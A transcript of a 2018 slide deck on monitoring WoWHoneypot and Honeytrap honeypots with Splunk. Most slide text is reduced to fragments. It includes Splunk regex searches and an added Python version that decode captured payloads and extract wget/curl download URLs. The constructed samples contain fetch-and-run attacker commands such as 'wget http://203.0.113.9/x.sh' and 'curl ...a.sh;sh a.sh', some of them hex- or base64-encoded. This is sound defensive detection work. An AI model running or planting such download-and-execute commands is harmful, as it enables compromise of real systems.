Honeypot Monitoring with Splunk (Splunkによるハニーポット監視.pdf)

sec-chick
September 30, 2018


Transcript

  1. SPLUNK SEC-CHICK

  2. WHO AM I • sec-chick (@one_sec_chick) • PSOC • (WoW Honeypot, Honeytrap)
  3. 

  4. Splunk / WoWHoneypot / Honeytrap / PC / VPS / SSH • Splunk
  5. SPLUNK • Splunk
    > http://www.intellilink.co.jp/pd/products/package/security/splunk.html
  6.    • WoWHoneypot

  7.    • Honeytrap

  8. 1. SSH … 2. Splunk … 3. Splunk … 4. … 5. … HEX
  9.   Attack_connection.local_port    10

  10. Attack_connection.payload.data_hex Hex →

  11.

  12. 1. Docker 2. … 3. Splunk 4. Suricata
  13. DOCKER • Docker • Docker →
  14. • Docker • cron • Splunk • WoWHoneypot • Honeytrap • VPS Honeypot • Docker
  15. Splunk • WoWHoneypot • Honeytrap • VPS Honeypot • Docker
  16. SPLUNK • Splunk • DECRYPT • … → Grep • … → … • URL → VirusTotal
  17. WOWHONEYPOT
    | rex field=_raw "\"(?<Method_wow>[^\s]+)\s(?<wow_path>[^\s]+)\s([^\s]+)\s([^\s]+)\s([^\s]+)\s(?<base64_wow>.*$)"
    | decrypt field="base64_wow" atob emit('base64_wow_decrypted')
    | eval decode=urldecode(base64_wow_decrypted)
    | rex field="decode" "wget.+(?<wget_wowhoneypot>https?://[\w/:\.\-]+?)\s"
    | rex field="decode" "curl.+(?<curl_wowhoneypot>https?://[\w/:\.\-]+?)\s"
  18. HONEYTRAP
    | decrypt field="attack_connection.payload.data_hex" unhex emit('attack_connection.payload.data_decrypted')
    | rex field="attack_connection.payload.data_decrypted" "wget.+(?<wget_honeytrap>https?://[\w/:\.\-]+?)\s"
    | rex field="attack_connection.payload.data_decrypted" "curl.+(?<curl_honeytrap>https?://[\w/:\.\-]+?)\s"
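Added example, not code from the deck: the slide 17 and 18 pipelines (base64 or hex decode, urldecode, then the wget/curl URL rex) re-implemented in Python over constructed sample events, so the patterns can be checked offline before they go into a Splunk search. The log line layout, IP addresses and payloads are assumptions, not real honeypot data.

```python
# Added example, not the deck's code: the slide 17/18 Splunk pipeline re-implemented in Python for offline checks.
import base64
import binascii
import re
from typing import Optional
from urllib.parse import unquote

# Same patterns as the rex commands on slides 17 and 18, in Python syntax ((?P<name>...)).
# Note the trailing \s: a URL followed by ';', '&&' or end-of-line is NOT captured.
WOW_REQUEST = re.compile(
    r'"(?P<Method_wow>[^\s]+)\s(?P<wow_path>[^\s]+)\s([^\s]+)\s([^\s]+)\s([^\s]+)\s(?P<base64_wow>.*$)')
WGET_URL = re.compile(r"wget.+(?P<url>https?://[\w/:\.\-]+?)\s")
CURL_URL = re.compile(r"curl.+(?P<url>https?://[\w/:\.\-]+?)\s")

def extract_urls(text: str) -> dict:
    """Download URLs named in a decoded payload (None where the pattern does not match)."""
    wget, curl = WGET_URL.search(text), CURL_URL.search(text)
    return {"wget_url": wget.group("url") if wget else None,
            "curl_url": curl.group("url") if curl else None}

def decode_wow_event(raw: str) -> Optional[dict]:
    """Slide 17: rex -> decrypt atob -> eval urldecode -> rex."""
    m = WOW_REQUEST.search(raw)
    if m is None:
        return None
    try:
        request = base64.b64decode(m.group("base64_wow"), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None  # not valid base64; in Splunk the DECRYPT output field would simply be empty
    decoded = unquote(request)
    return {"method": m.group("Method_wow"), "path": m.group("wow_path"),
            "decoded": decoded, **extract_urls(decoded)}

def decode_honeytrap_payload(data_hex: str) -> Optional[dict]:
    """Slide 18: decrypt unhex -> rex over attack_connection.payload.data_hex."""
    try:
        decoded = bytes.fromhex(data_hex).decode("utf-8", "replace")
    except ValueError:
        return None
    return {"decoded": decoded, **extract_urls(decoded)}

# Constructed sample events (not real honeypot data). The WoWHoneypot line is shaped the way the
# slide-17 rex expects: ... "METHOD path HTTP/1.1" status rule <base64 of the whole request>.
_REQ = b"POST /cgi-bin/x.cgi HTTP/1.1\r\nHost: 198.51.100.10\r\n\r\ncmd=cd%20/tmp;wget%20http://203.0.113.9/x.sh%20-O%20x.sh"
WOW_LINE = ('[2018-09-30 10:00:00+0900] 203.0.113.5 198.51.100.10 "POST /cgi-bin/x.cgi HTTP/1.1" 200 default '
            + base64.b64encode(_REQ).decode())
# "curl http://203.0.113.9/a.sh -o a.sh\n" as Honeytrap would record it in data_hex
HONEYTRAP_HEX = "6375726c20687474703a2f2f3230332e302e3131332e392f612e7368202d6f20612e73680a"
# Same command with ';' directly after the URL: the trailing \s in the rex makes this one a miss
HONEYTRAP_HEX_MISS = b"curl http://203.0.113.9/a.sh;sh a.sh\n".hex()
```

Running the three samples through both functions shows the URL captured from the WoWHoneypot request and the Honeytrap payload, and the miss on the `;`-terminated URL, which is worth knowing before relying on the rex for VirusTotal lookups.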
  19. HONEYTRAP

  20. SURICATA • Grep • … → … • Suricata
  21. • @Sec_S_Owl • @cactus_pots • @SugitaMuchi • @soji256 • @morihi_soc • Twitter • Slack • http://goo.gl/8bLkZA

  22.

  23. • Splunk